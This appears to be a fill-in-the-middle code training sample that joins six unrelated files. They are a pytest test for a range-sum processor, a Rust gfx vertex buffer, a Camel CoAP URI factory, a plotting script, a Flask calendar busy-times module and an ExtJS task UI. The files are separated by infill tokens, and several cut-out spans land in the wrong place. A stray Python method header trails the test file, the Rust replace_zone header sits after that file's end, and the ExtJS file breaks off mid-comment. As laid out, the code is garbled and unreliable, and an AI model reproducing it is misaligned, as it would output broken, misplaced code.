set_range_sum.root = None
@pytest.mark.parametrize(
"test_input,expected", [(
(
"? 1",
"+ 1",
"? 1",
"+ 2",
"s 1 2",
"+ 1000000000",
"? 1000000000",
"- 1000000000",
"? 1000000000",
"s 999999999 1000000000",
"- 2",
"? 2",
"- 0",
"+ 9",
"s 0 9"
),
[
"Not found",
"Found",
"3",
"Found",
"Not found",
"1",
"Not found",
"10",
]), (
(
"? 0",
"+ 0",
"? 0",
"- 0",
"? 0",
),
[
"Not found",
"Found",
"Not found"
]), (
(
"+ 491572259",
"? 491572259",
"? 899375874",
"s 310971296 877523306",
"+ 352411209",
),
[
"Found",
"Not found",
"491572259"
]),
# (
# (
# "s 88127140 859949755",
# "s 407584225 906606553",
# "+ 885530090",
# "+ 234423189",
# "s 30746291 664192454",
# "+ 465752492",
# "s 848498590 481606032",
# "+ 844636782",
# "+ 251529178",
# "+ 182631153",
# ),
# [
# "0",
# "0",
# "234423189"
# ])
])
def test_samples(self, test_input, expected):
result = []
processor = set_range_sum.RangeSumProcessor()
for cmd in test_input:
res = processor.process(cmd)
if res:
result.append(res)
assert result == expected
# def test_input_files(self):
# result = []
# processor = set_range_sum.RangeSumProcessor()
# for cmd in test_input:
# res = processor.process(cmd)
# if res:
# result.append(res)
# assert result == expected<|fim▁end|> | def has_any_children(self): |
<|file_name|>managed.rs<|end_file_name|><|fim▁begin|>use gfx::{Encoder, Resources, CommandBuffer, Slice, IndexBuffer};
use gfx::memory::{Usage, TRANSFER_DST};
use gfx::handle::Buffer;
use gfx::traits::{Factory, FactoryExt};
use gfx::buffer::Role;
use ui::render::Vertex;
// step: 128 vertices (4096 bytes, 42 triangles + 2 extra vertices)
const ALLOC_STEP: usize = 128;
/// A contiguous run of vertices inside `ManagedBuffer::local`, identified by
/// its starting index and length (see `new_zone` / the `Extend` impls).
#[derive(Debug)]
struct Zone {
    /// Index of the zone's first vertex in the local vector.
    start: usize,
    /// Number of vertices currently belonging to the zone.
    size: usize
}
/// CPU-side vertex staging area paired with a GPU vertex buffer; zones track
/// which sub-ranges are dirty and need re-uploading in `update`.
pub struct ManagedBuffer<R> where R: Resources {
    /// CPU-side copy of all vertices, appended to through the `Extend` impls.
    local: Vec<Vertex>,
    /// GPU vertex buffer mirroring `local`; (re)allocated in `ALLOC_STEP` pages.
    remote: Buffer<R, Vertex>,
    /// Each zone plus a dirty flag marking it for partial upload.
    zones: Vec<(Zone, bool)>,
    /// Total number of vertices currently in use in `local`.
    tail: usize
}
impl<R> ManagedBuffer<R> where R: Resources {
pub fn new<F>(factory: &mut F) -> Self where F: Factory<R> {
ManagedBuffer {
local: Vec::new(),
remote: factory.create_buffer(ALLOC_STEP, Role::Vertex, Usage::Dynamic, TRANSFER_DST).unwrap(),
zones: Vec::new(),
tail: 0
}
}
pub fn new_zone(&mut self) -> usize {
self.zones.push((Zone {start: self.tail, size: 0}, true));
self.zones.len() - 1
}<|fim▁hole|> *dirty = true;
if zone.size == buffer.len() {
let slice = &mut self.local[zone.start..zone.start + zone.size];
slice.copy_from_slice(buffer);
} else {
// TODO: Shift later elements forward or backwards.
unimplemented!()
}
}
fn get_zone(&self, index: usize) -> &[Vertex] {
let zone = &self.zones[index].0;
&self.local[zone.start..zone.start+zone.size]
}
// TODO: Handle errors.
pub fn update<F, C>(&mut self, factory: &mut F, encoder: &mut Encoder<R, C>) where F: Factory<R> + FactoryExt<R>, C: CommandBuffer<R> {
//println!("Begin update");
if self.local.len() > self.remote.len() {
// Full update
let (pages, other) = (self.local.len() / ALLOC_STEP, self.local.len() % ALLOC_STEP);
let pages = pages + if other != 0 {1} else {0};
//println!("Full update {} -> {}", self.remote.len(), pages * ALLOC_STEP);
self.remote = factory.create_buffer(pages * ALLOC_STEP, Role::Vertex, Usage::Dynamic, TRANSFER_DST).unwrap();
encoder.update_buffer(&self.remote, &self.local[..self.tail], 0).unwrap();
} else {
// Partial update
for &mut (ref zone, ref mut dirty) in self.zones.iter_mut().filter(|&&mut (_, dirty)| dirty) {
// TODO: Performance: Roll adjacent updates into a single update.
//println!("Update partial: {:?}", zone);
encoder.update_buffer(&self.remote, &self.local[zone.start..zone.start+zone.size], zone.start).unwrap();
*dirty = false
}
}
//println!("End update");
}
pub fn remote(&self) -> &Buffer<R, Vertex> {
&self.remote
}
pub fn slice(&self) -> Slice<R> {
Slice {
start: 0,
end: self.tail as u32,
base_vertex: 0,
instances: None,
buffer: IndexBuffer::Auto
}
}
}
impl<R> Extend<Vertex> for ManagedBuffer<R> where R: Resources {
fn extend<I>(&mut self, iter: I) where I: IntoIterator<Item=Vertex> {
if let Some(zone) = self.zones.last_mut() {
let old_len = self.local.len();
self.local.extend(iter);
let len = self.local.len() - old_len;
zone.0.size += len;
zone.1 = true;
self.tail += len;
} else {
panic!("Tried to extend to a previously created zone, but there are no zones.");
}
}
}
impl<'a, R> Extend<&'a Vertex> for ManagedBuffer<R> where R: Resources {
fn extend<I>(&mut self, iter: I) where I: IntoIterator<Item=&'a Vertex> {
if let Some(zone) = self.zones.last_mut() {
let old_len = self.local.len();
self.local.extend(iter);
let len = self.local.len() - old_len;
zone.0.size += len;
zone.1 = true;
self.tail += len;
} else {
panic!("Tried to extend to a previously created zone, but there are no zones.");
}
}
}<|fim▁end|> |
pub fn replace_zone(&mut self, buffer: &[Vertex], zone: usize) {
let (ref mut zone, ref mut dirty) = self.zones[zone]; |
<|file_name|>CoAPEndpointUriFactory.java<|end_file_name|><|fim▁begin|>/* Generated by camel build tools - do NOT edit this file! */
package org.apache.camel.coap;

import java.net.URISyntaxException;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

import org.apache.camel.spi.EndpointUriFactory;

/**
 * Generated by camel build tools - do NOT edit this file!
 */
public class CoAPEndpointUriFactory extends org.apache.camel.support.component.EndpointUriFactorySupport implements EndpointUriFactory {

    private static final String BASE = "coaps+tcp:uri";
    private static final String[] SCHEMES = new String[]{"coap", "coaps", "coap+tcp", "coaps+tcp"};

    private static final Set<String> PROPERTY_NAMES;
    static {
        // 17 endpoint options; "coapMethodRestrict" had been displaced by an
        // infill marker and is restored to its generated position here.
        Set<String> set = new HashSet<>(17);
        set.add("uri");
        set.add("alias");
        set.add("cipherSuites");
        set.add("clientAuthentication");
        set.add("privateKey");
        set.add("pskStore");
        set.add("publicKey");
        set.add("recommendedCipherSuitesOnly");
        set.add("sslContextParameters");
        set.add("trustedRpkStore");
        set.add("bridgeErrorHandler");
        set.add("coapMethodRestrict");
        set.add("exceptionHandler");
        set.add("exchangePattern");
        set.add("lazyStartProducer");
        set.add("basicPropertyBinding");
        set.add("synchronous");
        PROPERTY_NAMES = set;
    }

    @Override
    public boolean isEnabled(String scheme) {
        // The factory serves the coap scheme family (plain/secure, UDP/TCP).
        for (String s : SCHEMES) {
            if (s.equals(scheme)) {
                return true;
            }
        }
        return false;
    }

    @Override
    public String buildUri(String scheme, Map<String, Object> properties) throws URISyntaxException {
        String syntax = scheme + BASE;
        String uri = syntax;

        // Consume the path part first, then append the remaining properties
        // as query parameters.
        Map<String, Object> copy = new HashMap<>(properties);

        uri = buildPathParameter(syntax, uri, "uri", null, false, copy);
        uri = buildQueryParameters(uri, copy);
        return uri;
    }

    @Override
    public Set<String> propertyNames() {
        return PROPERTY_NAMES;
    }

    @Override
    public boolean isLenientProperties() {
        return false;
    }
}
<|file_name|>plot_chances.py<|end_file_name|><|fim▁begin|>import numpy as np
import matplotlib.pyplot as plt
import sys

# Plot "probability of correctness" vs. "fraction through data".
# Usage: python plot_chances.py "<S_err> <sigma_err> <S_read> <sigma_err> <S_curve>.txt"
# The input file holds 101 lines of "x y" pairs; the title parameters are
# parsed out of the file name itself.

fname = sys.argv[1]
exes = [0] * 101
wise = [0] * 101
# "with" guarantees the data file is closed (the original leaked the handle).
with open(fname, 'r') as f:
    for i in range(101):
        split = f.readline().split(" ")
        exes[i] = split[0]
        wise[i] = split[1]
x = np.asarray(exes)
y = np.asarray(wise)

# NOTE(review): this line had been displaced to after plt.show() by an infill
# marker; a figure must exist before the axes are labelled.
fig, ax = plt.subplots()

ax.set_xlabel("Fraction through data")
ax.set_ylabel("Probability of correctness")
tit = fname[:-4].split(" ")  # strip ".txt", split the parameter values
# Interleave the LaTeX labels with the values taken from the file name.
# Raw string: keeps "\sigma" intact without an invalid-escape warning.
inte = r"S_{err}= |, \sigma_{err}= |, S_{read}= |, \sigma_{err}= |, S_{curve}= ".split("|")
title = "$" + inte[0] + tit[0] + inte[1] + tit[1] + inte[2] + tit[2] + inte[3] + tit[3] + inte[4] + tit[4] + "$"
ax.set_title(title)
line, = ax.plot(x, y)
plt.show()
<|file_name|>busy_times.py<|end_file_name|><|fim▁begin|>import arrow
from dateutil import tz
import flask

import CONFIG

# Working-day boundaries (hours) applied to every event.
START_TIME = CONFIG.START_TIME
END_TIME = CONFIG.END_TIME


def get_busy_times(events):
    """
    Gets a list of busy times calculated from the list of events.

    :param events: a list of calendar events.
    :return: a list of busy times in ascending order.
    """
    # NOTE(review): the two date lines below had been displaced to the end of
    # the file by infill markers; restored to their call site here.
    begin_date = arrow.get(flask.session["begin_date"]).replace(
        hours=+START_TIME)
    end_date = arrow.get(flask.session['end_date']).replace(hours=+END_TIME)
    busy_dict = get_busy_dict(events, begin_date, end_date)
    busy = get_busy_list(busy_dict)
    return busy


def get_busy_dict(events, begin_date, end_date):
    """
    Fills a dictionary with possible busy times from the list of events.

    :param events: a list of calendar events.
    :param begin_date: is the start of the selected time interval.
    :param end_date: is the end of the selected time interval.
    :return: a dict of events representing possible busy times, keyed by
        each event's (possibly clamped) start time.
    """
    busy_dict = {}
    for event in events:
        available = is_available(event)
        event_start, event_end, is_all_day = get_start_end_datetime(event)
        # Clamp each event to the working day.
        day_start = event_start.replace(hour=START_TIME, minute=0)
        day_end = event_end.replace(hour=END_TIME, minute=0)

        # all day events that either begin or end in the time interval
        if ((begin_date <= event_start <= end_date or
                begin_date <= event_end <= end_date) and
                not available and is_all_day):
            if day_start < begin_date:
                event['start']['dateTime'] = begin_date.isoformat()
            else:
                event['start']['dateTime'] = day_start.isoformat()
            if event_end > end_date:
                event['end']['dateTime'] = end_date.isoformat()
            else:
                # All-day events end at midnight of the next day; pull the
                # end back one day so it lands on the event's last day.
                event['end']['dateTime'] = day_end.replace(days=-1).isoformat()
            busy_dict[event['start']['dateTime']] = event
        # events completely within individual days and the time interval
        elif (begin_date <= event_start <= end_date and
                begin_date <= event_end <= end_date and
                not available and not is_all_day):
            if event_start < day_start:
                event['start']['dateTime'] = day_start.isoformat()
            if event_end > day_end:
                event['end']['dateTime'] = day_end.isoformat()
            busy_dict[event['start']['dateTime']] = event
    return busy_dict


def get_busy_list(busy_dict):
    """
    Removes or combines the possible busy times from the busy dictionary and
    returns a sorted list.

    :param busy_dict: a dict of events representing possible busy times.
    :return: a sorted list of events representing busy times.
    """
    busy = []
    remove_list = []
    for i in sorted(busy_dict):
        for j in sorted(busy_dict):
            event = busy_dict[i]
            event_start = arrow.get(event['start']['dateTime'])
            event_end = arrow.get(event['end']['dateTime'])
            event_end_time = event_end.format('HH:mm')

            other_event = busy_dict[j]
            other_event_start = arrow.get(other_event['start']['dateTime'])
            other_event_end = arrow.get(other_event['end']['dateTime'])
            other_event_start_time = other_event_start.format('HH:mm')
            other_event_start_mod = other_event_start.replace(days=-1,
                                                             hour=END_TIME)
            if event != other_event:
                # Drop events fully contained in another busy span.
                if (other_event_start >= event_start and
                        other_event_end <= event_end):
                    remove_list.append(other_event)
                # Merge a span that ends at close of one day with a span that
                # starts at opening time of the following day.
                if (event_end_time == '17:00' and
                        other_event_start_time == '09:00' and
                        event_end == other_event_start_mod):
                    event['end']['dateTime'] = other_event['end']['dateTime']
                    remove_list.append(other_event)
                # Merge back-to-back spans.
                if event_end == other_event_start:
                    event['end']['dateTime'] = other_event['end']['dateTime']
                    remove_list.append(other_event)

    for i in sorted(busy_dict):
        if busy_dict[i] not in remove_list:
            busy.append(busy_dict[i])
    return busy


def get_events(service):
    """
    Gets a list of events from the Google calendar service.

    :param service: is the Google service from where the calendar is retrieved.
    :return: a list of events from every calendar checked in the session.
    """
    events = []
    for cal_id in flask.session['checked_calendars']:
        cal_items = service.events().list(calendarId=cal_id).execute()
        for cal_item in cal_items['items']:
            events.append(cal_item)
    return events


def is_available(event):
    """
    Checks if the event has the transparency attribute.

    :param event: is the event to check.
    :return: True if it is transparent and False if not
    """
    return 'transparency' in event


def get_start_end_datetime(event):
    """
    Gets the event's start and end as arrow objects.

    :param event: is the event to check.
    :return: a 3-tuple of the event's start and end as arrow objects plus a
        flag telling whether the event is an all-day event (date-only).
    """
    is_all_day = False
    if 'dateTime' in event['start']:
        event_start = arrow.get(
            event['start']['dateTime']).replace(tzinfo=tz.tzlocal())
        event_end = arrow.get(
            event['end']['dateTime']).replace(tzinfo=tz.tzlocal())
    else:
        # Date-only events are all-day events.
        event_start = arrow.get(
            event['start']['date']).replace(tzinfo=tz.tzlocal())
        event_end = arrow.get(
            event['end']['date']).replace(tzinfo=tz.tzlocal())
        is_all_day = True
    return event_start, event_end, is_all_day
<|file_name|>index.js<|end_file_name|><|fim▁begin|>Ext.namespace("Ext.haode");
// Page controller: copies the supplied config object onto the instance and
// immediately builds the viewport via init().
// @param {Object} args configuration applied onto the new instance
Ext.haode.Control = function(args){
	Ext.apply(this, args);
	this.init();
};
Ext.haode.Control.prototype = {
userName : '',
version : '',
app_name : '',
copyright : '',
viewport : null,
cn : 1,
init : function() {
this.viewport = this.getViewport();
},
getViewport : function() {
var viewport;
if (this.viewport) {
viewport = this.viewport;
} else {
var centerPanel = this.getCenterPanel();
viewport = new Ext.Viewport({
layout: 'fit',
items: [centerPanel]
});
}
return viewport;
},
getCenterPanel : function() {
var panel;
if (this.viewport) {
panel = this.getViewport().items[0];
} else {
var n = new Ext.Button({
id : 'tsb',
text : '发放任务',
align : 'right',
width : 80,
menu : [{
text : '常规任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
timeout : 1000000,
url : 'task.do?action=normal',
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
// }, {
// text : '个别任务',
// handler : function() {
// if (!Ext.getCmp('form').getForm().isValid()) {
// alert('请正确填写表单');
// return;
// }
//
// var sm = new Ext.grid.CheckboxSelectionModel();
// var store1 = new Ext.data.Store({
// proxy : new Ext.data.HttpProxy({
// url : 'customerManager.do?action=queryAll'
// }),
// reader : new Ext.data.JsonReader({
// root : 'rows',
// totalProperty : 'total',
// id : 'id',
// fields : ['id', 'name', 'username']
// })
// });
//
// var paging = new Ext.PagingToolbar({
// pageSize : 20,
// store : store1,
// displayInfo : true,
// displayMsg : '当前显示数据 {0} - {1} of {2}',
// emptyMsg : '没有数据'
// });
//
// var win = new Ext.Window({
// title : '客户经理',
// id : 'bind',
// layout : 'fit',
// border : false,
// modal : true,
// width : 500,
// height : 400,
// items : [new Ext.grid.GridPanel({
// id : 'grid1',
// loadMask : true,
//// tbar : [{
//// xtype : 'textfield',
//// id : 'searchName',
//// emptyText : '请输入客户经理名称...',
//// width : 150
//// }, {
//// text : '搜索',
//// width : 45,
//// xtype : 'button',
//// handler : function() {
////
//// }
//// }],
// store : store1,
// sm : sm,
// cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
// header : '客户经理名称',
// width : 200,
// dataIndex : 'name',
// align : 'center'
// }, {
// header : '客户经理用户名',
// width : 230,
// dataIndex : 'username',
// align : 'center'
// }]),
// bbar : paging
// })],
// buttons : [{
// text : '确定',
// handler : function() {
// var mrecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
// if (mrecords.length < 1) {
// alert('请选择要做任务的客户经理!');
// return;
// }
// var mids = '';
// for (var j = 0; j < mrecords.length; j++) {
// mids += ',' + mrecords[j].get('id');
// }
//
// Ext.getCmp('bind').close();
// Ext.getCmp('form').getForm().submit({
// waitTitle : '提示',
// waitMsg : '正在提交数据请稍后...',
// url : 'task.do?action=indevi',
// params : {
// mids : mids
// },
// method : 'post',
// success : function(form, action) {
// alert(action.result.myHashMap.msg);
// },
// failure : function(form, action) {
// alert(action.result.myHashMap.msg);
// }
// });
//
// }
// }, {
// text : '取消',
// handler : function() {
// Ext.getCmp('bind').close();
// }
// }]
// });
// win.show(Ext.getBody());
// store1.load({
// params : {
// start : 0,
// limit : 20
// }
// });
//
// }
}, {
text : '分组任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var sm = new Ext.grid.CheckboxSelectionModel();
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customerGroup.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var win = new Ext.Window({
title : '客户分组',
id : 'bind',
layout : 'fit',
border : false,
modal : true,
width : 500,
height : 400,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户分组名称',
width : 200,
dataIndex : 'name',
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var grecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (grecords.length < 1) {
alert('请选择客户分组!');
return;
}
var gids = '';
for (var j = 0; j < grecords.length; j++) {
gids += ',' + grecords[j].get('id');
}
Ext.getCmp('bind').close();
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=group',
params : {
gids : gids
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('bind').close();
}
}]
});
win.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20,
all : 0
}
});
}
}, {
text : '客户任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customer.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'number', 'sell_number', 'store_name', 'level', 'phone_number', 'manager',
'backup_number', 'address', 'order_type', 'gps', 'last_visit_time']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var sm = new Ext.grid.CheckboxSelectionModel();
var win1 = new Ext.Window({
title : '选择客户',
id : 'chooseCustomer',
layout : 'fit',
border : false,
modal : true,
width : 800,
height : 600,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户名称',
width : 100,
dataIndex : 'name',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户编号',
width : 130,
dataIndex : 'number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '专卖证号',
width : 130,
dataIndex : 'sell_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '店铺名称',
width : 200,
dataIndex : 'store_name',
sortable : true,
remoteSort : true,
align : 'left'
}, {
header : '客户级别',
width : 90,
dataIndex : 'level',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '电话号码',
width : 100,
dataIndex : 'phone_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户经理',
width : 120,
dataIndex : 'manager',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '备用号码',
width : 100,
dataIndex : 'backup_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '经营地址',
width : 240,
dataIndex : 'address',
sortable : true,
remoteSort : true,
align : 'left',
renderer : function(value, meta) {
meta.attr = 'title="' + value + '"';
return value;
}
}, {
header : '订货类型',
width : 60,
dataIndex : 'order_type',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : 'GPS(经度,纬度)',
width : 150,
dataIndex : 'gps',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '最近一次拜访时间',
width : 180,
dataIndex : 'last_visit_time',
sortable : true,
remoteSort : true,
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var crecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (crecords.length < 1) {
alert('请选择要拜访的客户!');
return;
}
var size = crecords.length;
var cids = "";
for (var i = 0; i < size; i++) {
cids += ',' + crecords[i].get('id');
}
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=customerTask',
params : {
cids : cids
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
Ext.getCmp('chooseCustomer').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('chooseCustomer').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}, {
text : '自定义任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var cids = '';
var mid = '';
var win = new Ext.Window({
title : '自定义任务',
id : 'editWin',
layout : 'fit',
border : false,
modal : true,
width : 500,
height : 250,
items : [new Ext.form.FormPanel({
id : 'editForm',
frame : true,
bodyStyle : 'padding : 30px; 20px;',
defaults : {
msgTarget : 'under'
},
height : 'auto',
labelWidth : 80,
labelAlign : 'right',
items : [{
xtype : 'compositefield',
width : 500,
items : [{
fieldLabel : '客户名称',
xtype : 'textfield',
id : 'customer',
allowBlank : false,
width : 300
}, {
text : '浏览…',
xtype : 'button',
handler : function() {
// 选择客户
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customer.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'number', 'sell_number', 'store_name', 'level', 'phone_number', 'manager',
'backup_number', 'address', 'order_type', 'gps', 'last_visit_time']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var sm = new Ext.grid.CheckboxSelectionModel();
var win1 = new Ext.Window({
title : '选择客户',
id : 'chooseCustomer',
layout : 'fit',
border : false,
modal : true,
width : 800,
height : 600,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户名称',
width : 100,
dataIndex : 'name',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户编号',
width : 130,
dataIndex : 'number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '专卖证号',
width : 130,
dataIndex : 'sell_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '店铺名称',
width : 200,
dataIndex : 'store_name',
sortable : true,
remoteSort : true,
align : 'left'
}, {
header : '客户级别',
width : 90,
dataIndex : 'level',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '电话号码',
width : 100,
dataIndex : 'phone_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户经理',
width : 120,
dataIndex : 'manager',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '备用号码',
width : 100,
dataIndex : 'backup_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '经营地址',
width : 240,
dataIndex : 'address',
sortable : true,
remoteSort : true,
align : 'left',
renderer : function(value, meta) {
meta.attr = 'title="' + value + '"';
return value;
}
}, {
header : '订货类型',
width : 60,
dataIndex : 'order_type',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : 'GPS(经度,纬度)',
width : 150,
dataIndex : 'gps',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '最近一次拜访时间',
width : 180,
dataIndex : 'last_visit_time',
sortable : true,
remoteSort : true,
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var crecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (crecords.length < 1) {
alert('请选择要拜访的客户!');
return;
}
var size = crecords.length;
var cnames = '';
for (var i = 0; i < size; i++) {
cids += ',' + crecords[i].get('id');
cnames += ',' + crecords[i].get('name');
}
Ext.getCmp('customer').setValue(cnames.substring(1));
Ext.getCmp('chooseCustomer').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('chooseCustomer').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}]
}, {
xtype : 'compositefield',
width : 500,
items : [{
fieldLabel : '客户经理',
xtype : 'textfield',
id : 'manager',
allowBlank : false,
width : 300
}, {
text : '浏览…',
xtype : 'button',
handler : function() {
// 选择客户经理
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customerManager.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'username', 'department', 'area']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var win1 = new Ext.Window({
title : '选择客户经理',
id : 'bind',
layout : 'fit',
border : false,
modal : true,
width : 600,
height : 400,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), {
header : '客户经理名称',
width : 130,
dataIndex : 'name',
align : 'center'
}, {
header : '用户名',
width : 130,
dataIndex : 'username',
align : 'center'
}, {
header : '部门',
width : 130,
dataIndex : 'department',
align : 'center'
}, {
header : '片区',
width : 130,
dataIndex : 'area',
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var mrecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (mrecords.length < 1) {
alert('请选择客户经理!');
return;
}
mid = mrecords[0].get('id');
var manager = mrecords[0].get('name');
if (mrecords[0].get('department') != "") {
manager = manager + "-" + mrecords[0].get('department');
}
if (mrecords[0].get('area') != "") {
manager = manager + "-" + mrecords[0].get('area');
}
Ext.getCmp('manager').setValue(manager);
Ext.getCmp('bind').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('bind').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}]
}],
buttons : [{
text : '确定',
handler : function() {
Ext.getCmp('editWin').close();
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
<|fim▁hole|> url : 'task.do?action=newCustomerTask',
params : {
mid : mid,
cids : cids,
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('editWin').close();
}
}]
})]
});
win.show(Ext.getBody());
}
}]
});
panel = new Ext.form.FormPanel({
id : 'form',
defaults : {
width : 250,
msgTarget : 'under'
},
bodyStyle : 'padding : 50px; 150px;',
labelWidth : 80,
labelAlign : 'right',
tbar : [{
xtype : 'button',
id : 'ad',
iconCls : 'add',
text : '增加内容',
align : 'right',
width : 80,
handler : function() {
this.cn = this.cn + 1;
var f = Ext.getCmp('form');
var a = Ext.getCmp('ad');
var t = Ext.getCmp('tsb');
var c = new Ext.form.TextField({
fieldLabel : '任务内容' + this.cn,
allowBlank : false,
name : 'content' + this.cn,
id : 'content' + this.cn,
xtype : 'textfield'
});
f.remove(t);
f.add(c);
f.add(n);
f.doLayout();
},
scope : this
}],
items : [{
fieldLabel : '任务起始时间',
allowBlank : false,
editable : false,
name : 'start',
id : 'start',
xtype : 'datefield'
}, {
fieldLabel : '任务完成时间',
allowBlank : false,
editable : false,
name : 'end',
id : 'end',
xtype : 'datefield'
}, {
fieldLabel : '任务标题',
allowBlank : false,
name : 'content',
id : 'content',
xtype : 'textfield'
}, {
fieldLabel : '任务内容' + this.cn,
allowBlank : false,
name : 'content' + this.cn,
id : 'content' + this.cn,
xtype : 'textfield'
}, {
xtype : 'button',
id : 'tsb',
text : '发放任务',
align : 'right',
width : 80,
menu : [{
text : '常规任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=normal',
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
// }, {
// text : '个别任务',
// handler : function() {
// if (!Ext.getCmp('form').getForm().isValid()) {
// alert('请正确填写表单');
// return;
// }
//
//
// var sm = new Ext.grid.CheckboxSelectionModel();
// var store1 = new Ext.data.Store({
// proxy : new Ext.data.HttpProxy({
// url : 'customerManager.do?action=queryAll'
// }),
// reader : new Ext.data.JsonReader({
// root : 'rows',
// totalProperty : 'total',
// id : 'id',
// fields : ['id', 'name', 'username']
// })
// });
//
// var paging = new Ext.PagingToolbar({
// pageSize : 20,
// store : store1,
// displayInfo : true,
